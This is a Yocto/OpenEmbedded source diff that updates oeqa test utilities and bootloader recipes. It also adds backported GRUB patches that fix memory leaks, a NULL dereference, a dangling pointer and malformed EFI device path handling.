--- a/meta/lib/oeqa/utils/commands.py
+++ b/meta/lib/oeqa/utils/commands.py
@@ -125,11 +125,11 @@ class Command(object):
def stop(self):
for thread in self.threads:
- if thread.isAlive():
+ if thread.is_alive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
thread.join(5)
- if thread.isAlive():
+ if thread.is_alive():
self.process.kill()
thread.join()
@@ -174,11 +174,8 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
if native_sysroot:
extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \
(native_sysroot, native_sysroot, native_sysroot)
- extra_libpaths = "%s/lib:%s/usr/lib" % \
- (native_sysroot, native_sysroot)
nenv = dict(options.get('env', os.environ))
nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '')
- nenv['LD_LIBRARY_PATH'] = extra_libpaths + ':' + nenv.get('LD_LIBRARY_PATH', '')
options['env'] = nenv
cmd = Command(command, timeout=timeout, output_log=output_log, **options)
@@ -188,7 +185,10 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
# call sync around the tests to ensure the IO queue doesn't get too large, taking any IO
# hit here rather than in bitbake shutdown.
if sync:
+ p = os.environ['PATH']
+ os.environ['PATH'] = "/usr/bin:/bin:/usr/sbin:/sbin:" + p
os.system("sync")
+ os.environ['PATH'] = p
result.command = command
result.status = cmd.status
diff --git a/meta/lib/oeqa/utils/metadata.py b/meta/lib/oeqa/utils/metadata.py
index 8013aa684d..15ec190c4a 100644
--- a/meta/lib/oeqa/utils/metadata.py
+++ b/meta/lib/oeqa/utils/metadata.py
@@ -27,9 +27,9 @@ def metadata_from_bb():
data_dict = get_bb_vars()
# Distro information
- info_dict['distro'] = {'id': data_dict['DISTRO'],
- 'version_id': data_dict['DISTRO_VERSION'],
- 'pretty_name': '%s %s' % (data_dict['DISTRO'], data_dict['DISTRO_VERSION'])}
+ info_dict['distro'] = {'id': data_dict.get('DISTRO', 'NODISTRO'),
+ 'version_id': data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'),
+ 'pretty_name': '%s %s' % (data_dict.get('DISTRO', 'NODISTRO'), data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'))}
# Host distro information
os_release = get_os_release()
diff --git a/meta/lib/oeqa/utils/nfs.py b/meta/lib/oeqa/utils/nfs.py
index a37686c914..c9bac050a4 100644
--- a/meta/lib/oeqa/utils/nfs.py
+++ b/meta/lib/oeqa/utils/nfs.py
@@ -8,7 +8,7 @@ from oeqa.utils.commands import bitbake, get_bb_var, Command
from oeqa.utils.network import get_free_port
@contextlib.contextmanager
-def unfs_server(directory, logger = None):
+def unfs_server(directory, logger = None, udp = True):
unfs_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "unfs3-native")
if not os.path.exists(os.path.join(unfs_sysroot, "usr", "bin", "unfsd")):
# build native tool
@@ -22,7 +22,7 @@ def unfs_server(directory, logger = None):
exports.write("{0} (rw,no_root_squash,no_all_squash,insecure)\n".format(directory).encode())
# find some ports for the server
- nfsport, mountport = get_free_port(udp = True), get_free_port(udp = True)
+ nfsport, mountport = get_free_port(udp), get_free_port(udp)
nenv = dict(os.environ)
nenv['PATH'] = "{0}/sbin:{0}/usr/sbin:{0}/usr/bin:".format(unfs_sysroot) + nenv.get('PATH', '')
diff --git a/meta/lib/oeqa/utils/qemurunner.py b/meta/lib/oeqa/utils/qemurunner.py
index 77ec939ad7..c84d299a80 100644
--- a/meta/lib/oeqa/utils/qemurunner.py
+++ b/meta/lib/oeqa/utils/qemurunner.py
@@ -70,6 +70,8 @@ class QemuRunner:
self.monitorpipe = None
self.logger = logger
+ # Whether we're expecting an exit and should show related errors
+ self.canexit = False
# Enable testing other OS's
# Set commands for target communication, and default to Linux ALWAYS
@@ -118,7 +120,10 @@ class QemuRunner:
import fcntl
fl = fcntl.fcntl(o, fcntl.F_GETFL)
fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK)
- return os.read(o.fileno(), 1000000).decode("utf-8")
+ try:
+ return os.read(o.fileno(), 1000000).decode("utf-8")
+ except BlockingIOError:
+ return ""
def handleSIGCHLD(self, signum, frame):
@@ -229,7 +234,7 @@ class QemuRunner:
r = os.fdopen(r)
x = r.read()
os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM)
- sys.exit(0)
+ os._exit(0)
self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid)
self.logger.debug("waiting at most %s seconds for qemu pid (%s)" %
@@ -427,12 +432,17 @@ class QemuRunner:
except OSError as e:
if e.errno != errno.ESRCH:
raise
- endtime = time.time() + self.runqemutime
- while self.runqemu.poll() is None and time.time() < endtime:
- time.sleep(1)
- if self.runqemu.poll() is None:
+ try:
+ outs, errs = self.runqemu.communicate(timeout = self.runqemutime)
+ if outs:
+ self.logger.info("Output from runqemu:\n%s", outs.decode("utf-8"))
+ if errs:
+ self.logger.info("Stderr from runqemu:\n%s", errs.decode("utf-8"))
+ except TimeoutExpired:
self.logger.debug("Sending SIGKILL to runqemu")
os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL)
+ if not self.runqemu.stdout.closed:
+ self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout))
self.runqemu.stdin.close()
self.runqemu.stdout.close()
self.runqemu_exited = True
@@ -467,6 +477,11 @@ class QemuRunner:
self.thread.stop()
self.thread.join()
+ def allowexit(self):
+ self.canexit = True
+ if self.thread:
+ self.thread.allowexit()
+
def restart(self, qemuparams = None):
self.logger.warning("Restarting qemu process")
if self.runqemu.poll() is None:
@@ -522,7 +537,9 @@ class QemuRunner:
if re.search(self.boot_patterns['search_cmd_finished'], data):
break
else:
- raise Exception("No data on serial console socket")
+ if self.canexit:
+ return (1, "")
+ raise Exception("No data on serial console socket, connection closed?")
if data:
if raw:
@@ -560,6 +577,7 @@ class LoggingThread(threading.Thread):
self.logger = logger
self.readsock = None
self.running = False
+ self.canexit = False
self.errorevents = select.POLLERR | select.POLLHUP | select.POLLNVAL
self.readevents = select.POLLIN | select.POLLPRI
@@ -593,6 +611,9 @@ class LoggingThread(threading.Thread):
self.close_ignore_error(self.writepipe)
self.running = False
+ def allowexit(self):
+ self.canexit = True
+
def eventloop(self):
poll = select.poll()
event_read_mask = self.errorevents | self.readevents
@@ -638,7 +659,7 @@ class LoggingThread(threading.Thread):
data = self.readsock.recv(count)
except socket.error as e:
if e.errno == errno.EAGAIN or e.errno == errno.EWOULDBLOCK:
- return ''
+ return b''
else:
raise
@@ -649,7 +670,9 @@ class LoggingThread(threading.Thread):
# happened. But for this code it counts as an
# error since the connection shouldn't go away
# until qemu exits.
- raise Exception("Console connection closed unexpectedly")
+ if not self.canexit:
+ raise Exception("Console connection closed unexpectedly")
+ return b''
return data
diff --git a/meta/lib/oeqa/utils/targetbuild.py b/meta/lib/oeqa/utils/targetbuild.py
index 1055810ca3..09738add1d 100644
--- a/meta/lib/oeqa/utils/targetbuild.py
+++ b/meta/lib/oeqa/utils/targetbuild.py
@@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta):
self.d = d
self.uri = uri
self.archive = os.path.basename(uri)
+ self.tempdirobj = None
if not tmpdir:
tmpdir = self.d.getVar('WORKDIR')
if not tmpdir:
@@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta):
return self._run('cd %s; make install %s' % (self.targetdir, install_args))
def clean(self):
+ if self.tempdirobj:
+ self.tempdirobj.cleanup()
self._run('rm -rf %s' % self.targetdir)
subprocess.check_call('rm -f %s' % self.localarchive, shell=True)
- pass
class TargetBuildProject(BuildProject):
diff --git a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
index 5d6f200a73..e9dfa0770e 100644
--- a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
+++ b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
@@ -10,7 +10,7 @@ DEPENDS = "efivar popt"
COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
-SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \
+SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \
file://0001-remove-extra-decl.patch \
file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \
"
diff --git a/meta/recipes-bsp/efivar/efivar/determinism.patch b/meta/recipes-bsp/efivar/efivar/determinism.patch
new file mode 100644
index 0000000000..bdf6bfc4a8
--- /dev/null
+++ b/meta/recipes-bsp/efivar/efivar/determinism.patch
@@ -0,0 +1,18 @@
+Fix reproducibility issue caused by unsorted wildcard expansion.
+
+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -15,7 +15,7 @@ TARGETS=$(LIBTARGETS) $(BINTARGETS) $(PC
+ STATICTARGETS=$(STATICLIBTARGETS) $(STATICBINTARGETS)
+
+ LIBEFIBOOT_SOURCES = crc32.c creator.c disk.c gpt.c loadopt.c path-helpers.c \
+- linux.c $(wildcard linux-*.c)
++ linux.c $(sort $(wildcard linux-*.c))
+ LIBEFIBOOT_OBJECTS = $(patsubst %.c,%.o,$(LIBEFIBOOT_SOURCES))
+ LIBEFIVAR_SOURCES = dp.c dp-acpi.c dp-hw.c dp-media.c dp-message.c \
+ efivarfs.c error.c export.c guid.c guids.S guid-symbols.c \
diff --git a/meta/recipes-bsp/efivar/efivar_37.bb b/meta/recipes-bsp/efivar/efivar_37.bb
index 9b95721a4e..858c61ae6a 100644
--- a/meta/recipes-bsp/efivar/efivar_37.bb
+++ b/meta/recipes-bsp/efivar/efivar_37.bb
@@ -7,7 +7,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393"
COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
-SRC_URI = "git://github.com/rhinstaller/efivar.git \
+SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=main;protocol=https \
+ file://determinism.patch \
file://no-werror.patch"
SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10"
diff --git a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
index 9954d7f57a..191b0bc176 100644
--- a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
+++ b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
@@ -1,5 +1,6 @@
SUMMARY = "Libraries for producing EFI binaries"
HOMEPAGE = "http://sourceforge.net/projects/gnu-efi/"
+DESCRIPTION = "GNU-EFI aims to Develop EFI applications for ARM-64, ARM-32, x86_64, IA-64 (IPF), IA-32 (x86), and MIPS platforms using the GNU toolchain and the EFI development environment."
SECTION = "devel"
LICENSE = "GPLv2+ | BSD-2-Clause"
LIC_FILES_CHKSUM = "file://gnuefi/crt0-efi-arm.S;beginline=4;endline=16;md5=e582764a4776e60c95bf9ab617343d36 \
diff --git a/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
new file mode 100644
index 0000000000..eaaa7effae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
@@ -0,0 +1,39 @@
+From 0900f11def2e7fbb4880efff0cd9c9b32f1cdb86 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 3 Dec 2020 14:39:45 +0000
+Subject: [PATCH] mmap: Fix memory leak when iterating over mapped memory
+
+When returning from grub_mmap_iterate() the memory allocated to present
+is not being released causing it to leak.
+
+Fixes: CID 96655
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8cb2848f9699642a698af84b12ba187cab722031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/mmap/mmap.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 7ebf32e..8bf235f 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
+@@ -270,6 +270,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
+ hook_data))
+ {
+ grub_free (ctx.scanline_events);
++ grub_free (present);
+ return GRUB_ERR_NONE;
+ }
+
+@@ -282,6 +283,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
+ }
+
+ grub_free (ctx.scanline_events);
++ grub_free (present);
+ return GRUB_ERR_NONE;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
new file mode 100644
index 0000000000..d00821f5c3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
@@ -0,0 +1,39 @@
+From f216a75e884ed5e4e94bf86965000dde51148f94 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 27 Nov 2020 15:10:26 +0000
+Subject: [PATCH] net/net: Fix possible dereference to of a NULL pointer
+
+It is always possible that grub_zalloc() could fail, so we should check for
+a NULL return. Otherwise we run the risk of dereferencing a NULL pointer.
+
+Fixes: CID 296221
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03f2515ae0c503406f1a99a2178405049c6555db]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/net.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/net/net.c b/grub-core/net/net.c
+index 38f19df..7c2cdf2 100644
+--- a/grub-core/net/net.c
++++ b/grub-core/net/net.c
+@@ -86,8 +86,13 @@ grub_net_link_layer_add_address (struct grub_net_card *card,
+
+ /* Add sender to cache table. */
+ if (card->link_layer_table == NULL)
+- card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
+- * sizeof (card->link_layer_table[0]));
++ {
++ card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
++ * sizeof (card->link_layer_table[0]));
++ if (card->link_layer_table == NULL)
++ return;
++ }
++
+ entry = &(card->link_layer_table[card->new_ll_entry]);
+ entry->avail = 1;
+ grub_memcpy (&entry->ll_address, ll, sizeof (entry->ll_address));
diff --git a/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
new file mode 100644
index 0000000000..3b4633507d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
@@ -0,0 +1,33 @@
+From 09cc0df477758b60f51fbc0da1dee2f5d54c333d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 19 Feb 2021 17:12:23 +0000
+Subject: [PATCH] net/tftp: Fix dangling memory pointer
+
+The static code analysis tool, Parfait, reported that the valid of
+file->data was left referencing memory that was freed by the call to
+grub_free(data) where data was initialized from file->data.
+
+To ensure that there is no unintentional access to this memory
+referenced by file->data we should set the pointer to NULL.
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0cb838b281a68b536a09681f9557ea6a7ac5da7a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/tftp.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/net/tftp.c b/grub-core/net/tftp.c
+index 7d90bf6..f76b19f 100644
+--- a/grub-core/net/tftp.c
++++ b/grub-core/net/tftp.c
+@@ -468,6 +468,7 @@ tftp_close (struct grub_file *file)
+ }
+ destroy_pq (data);
+ grub_free (data);
++ file->data = NULL;
+ return GRUB_ERR_NONE;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
new file mode 100644
index 0000000000..933416605c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
@@ -0,0 +1,50 @@
+From 8861fa6226f7229105722ba669465e879b56ee2b Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 22 Jan 2021 12:32:41 +0000
+Subject: [PATCH] kern/parser: Fix resource leak if argc == 0
+
+After processing the command-line yet arriving at the point where we are
+setting argv, we are allocating memory, even if argc == 0, which makes
+no sense since we never put anything into the allocated argv.
+
+The solution is to simply return that we've successfully processed the
+arguments but that argc == 0, and also ensure that argv is NULL when
+we're not allocating anything in it.
+
+There are only 2 callers of this function, and both are handling a zero
+value in argc assuming nothing is allocated in argv.
+
+Fixes: CID 96680
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d06161b035dde4769199ad65aa0a587a5920012b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/parser.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index 619db31..d1cf061 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -146,6 +146,7 @@ grub_parser_split_cmdline (const char *cmdline,
+ int i;
+
+ *argc = 0;
++ *argv = NULL;
+ do
+ {
+ if (!rd || !*rd)
+@@ -207,6 +208,10 @@ grub_parser_split_cmdline (const char *cmdline,
+ (*argc)++;
+ }
+
++ /* If there are no args, then we're done. */
++ if (!*argc)
++ return 0;
++
+ /* Reserve memory for the return values. */
+ args = grub_malloc (bp - buffer);
+ if (!args)
diff --git a/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
new file mode 100644
index 0000000000..04748befc8
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
@@ -0,0 +1,235 @@
+From 16a4d739b19f8680cf93a3c8fa0ae9fc1b1c310b Mon Sep 17 00:00:00 2001
+From: Peter Jones <pjones@redhat.com>
+Date: Sun, 19 Jul 2020 16:53:27 -0400
+Subject: [PATCH] efi: Fix some malformed device path arithmetic errors
+
+Several places we take the length of a device path and subtract 4 from
+it, without ever checking that it's >= 4. There are also cases where
+this kind of malformation will result in unpredictable iteration,
+including treating the length from one dp node as the type in the next
+node. These are all errors, no matter where the data comes from.
+
+This patch adds a checking macro, GRUB_EFI_DEVICE_PATH_VALID(), which
+can be used in several places, and makes GRUB_EFI_NEXT_DEVICE_PATH()
+return NULL and GRUB_EFI_END_ENTIRE_DEVICE_PATH() evaluate as true when
+the length is too small. Additionally, it makes several places in the
+code check for and return errors in these cases.
+
+Signed-off-by: Peter Jones <pjones@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d2cf823d0e31818d1b7a223daff6d5e006596543]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 64 +++++++++++++++++++++++++-----
+ grub-core/loader/efi/chainloader.c | 13 +++++-
+ grub-core/loader/i386/xnu.c | 9 +++--
+ include/grub/efi/api.h | 14 ++++---
+ 4 files changed, 79 insertions(+), 21 deletions(-)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index ad170c7..6a38080 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -360,7 +360,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+
+ dp = dp0;
+
+- while (1)
++ while (dp)
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -370,9 +370,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ if (type == GRUB_EFI_MEDIA_DEVICE_PATH_TYPE
+ && subtype == GRUB_EFI_FILE_PATH_DEVICE_PATH_SUBTYPE)
+ {
+- grub_efi_uint16_t len;
+- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+- / sizeof (grub_efi_char16_t));
++ grub_efi_uint16_t len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++ len = (len - 4) / sizeof (grub_efi_char16_t);
+ filesize += GRUB_MAX_UTF8_PER_UTF16 * len + 2;
+ }
+
+@@ -388,7 +394,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ if (!name)
+ return NULL;
+
+- while (1)
++ while (dp)
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -404,8 +410,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+
+ *p++ = '/';
+
+- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+- / sizeof (grub_efi_char16_t));
++ len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ len = (len - 4) / sizeof (grub_efi_char16_t);
+ fp = (grub_efi_file_path_device_path_t *) dp;
+ /* According to EFI spec Path Name is NULL terminated */
+ while (len > 0 && fp->path_name[len - 1] == 0)
+@@ -480,7 +493,26 @@ grub_efi_duplicate_device_path (const grub_efi_device_path_t *dp)
+ ;
+ p = GRUB_EFI_NEXT_DEVICE_PATH (p))
+ {
+- total_size += GRUB_EFI_DEVICE_PATH_LENGTH (p);
++ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (p);
++
++ /*
++ * In the event that we find a node that's completely garbage, for
++ * example if we get to 0x7f 0x01 0x02 0x00 ... (EndInstance with a size
++ * of 2), GRUB_EFI_END_ENTIRE_DEVICE_PATH() will be true and
++ * GRUB_EFI_NEXT_DEVICE_PATH() will return NULL, so we won't continue,
++ * and neither should our consumers, but there won't be any error raised
++ * even though the device path is junk.
++ *
++ * This keeps us from passing junk down back to our caller.
++ */
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ total_size += len;
+ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (p))
+ break;
+ }
+@@ -525,7 +557,7 @@ dump_vendor_path (const char *type, grub_efi_vendor_device_path_t *vendor)
+ void
+ grub_efi_print_device_path (grub_efi_device_path_t *dp)
+ {
+- while (1)
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp))
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -937,7 +969,10 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+ /* Return non-zero. */
+ return 1;
+
+- while (1)
++ if (dp1 == dp2)
++ return 0;
++
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
+ {
+ grub_efi_uint8_t type1, type2;
+ grub_efi_uint8_t subtype1, subtype2;
+@@ -973,5 +1008,14 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+ dp2 = (grub_efi_device_path_t *) ((char *) dp2 + len2);
+ }
+
++ /*
++ * There's no "right" answer here, but we probably don't want to call a valid
++ * dp and an invalid dp equal, so pick one way or the other.
++ */
++ if (GRUB_EFI_DEVICE_PATH_VALID (dp1) && !GRUB_EFI_DEVICE_PATH_VALID (dp2))
++ return 1;
++ else if (!GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
++ return -1;
++
+ return 0;
+ }
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index daf8c6b..a8d7b91 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -156,9 +156,18 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+
+ size = 0;
+ d = dp;
+- while (1)
++ while (d)
+ {
+- size += GRUB_EFI_DEVICE_PATH_LENGTH (d);
++ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (d);
++
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ size += len;
+ if ((GRUB_EFI_END_ENTIRE_DEVICE_PATH (d)))
+ break;
+ d = GRUB_EFI_NEXT_DEVICE_PATH (d);
+diff --git a/grub-core/loader/i386/xnu.c b/grub-core/loader/i386/xnu.c
+index b7d176b..c50cb54 100644
+--- a/grub-core/loader/i386/xnu.c
++++ b/grub-core/loader/i386/xnu.c
+@@ -516,14 +516,15 @@ grub_cmd_devprop_load (grub_command_t cmd __attribute__ ((unused)),
+
+ devhead = buf;
+ buf = devhead + 1;
+- dpstart = buf;
++ dp = dpstart = buf;
+
+- do
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp) && buf < bufend)
+ {
+- dp = buf;
+ buf = (char *) buf + GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp))
++ break;
++ dp = buf;
+ }
+- while (!GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp) && buf < bufend);
+
+ dev = grub_xnu_devprop_add_device (dpstart, (char *) buf
+ - (char *) dpstart);
+diff --git a/include/grub/efi/api.h b/include/grub/efi/api.h
+index addcbfa..cf1355a 100644
+--- a/include/grub/efi/api.h
++++ b/include/grub/efi/api.h
+@@ -625,6 +625,7 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_DEVICE_PATH_TYPE(dp) ((dp)->type & 0x7f)
+ #define GRUB_EFI_DEVICE_PATH_SUBTYPE(dp) ((dp)->subtype)
+ #define GRUB_EFI_DEVICE_PATH_LENGTH(dp) ((dp)->length)
++#define GRUB_EFI_DEVICE_PATH_VALID(dp) ((dp) != NULL && GRUB_EFI_DEVICE_PATH_LENGTH (dp) >= 4)
+
+ /* The End of Device Path nodes. */
+ #define GRUB_EFI_END_DEVICE_PATH_TYPE (0xff & 0x7f)
+@@ -633,13 +634,16 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_END_THIS_DEVICE_PATH_SUBTYPE 0x01
+
+ #define GRUB_EFI_END_ENTIRE_DEVICE_PATH(dp) \
+- (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
+- && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
+- == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE))
++ (!GRUB_EFI_DEVICE_PATH_VALID (dp) || \
++ (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
++ && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
++ == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE)))
+
+ #define GRUB_EFI_NEXT_DEVICE_PATH(dp) \
+- ((grub_efi_device_path_t *) ((char *) (dp) \
+- + GRUB_EFI_DEVICE_PATH_LENGTH (dp)))
++ (GRUB_EFI_DEVICE_PATH_VALID (dp) \
++ ? ((grub_efi_device_path_t *) \
++ ((char *) (dp) + GRUB_EFI_DEVICE_PATH_LENGTH (dp))) \
++ : NULL)
+
+ /* Hardware Device Path. */
+ #define GRUB_EFI_HARDWARE_DEVICE_PATH_TYPE 1
diff --git a/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
new file mode 100644
index 0000000000..9d7327cee6
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
@@ -0,0 +1,30 @@
+From d4fd0243920b71cc6e03cc0cadf23b4fe03c352f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:15:25 +0000
+Subject: [PATCH] kern/efi: Fix memory leak on failure
+
+Free the memory allocated to name before returning on failure.
+
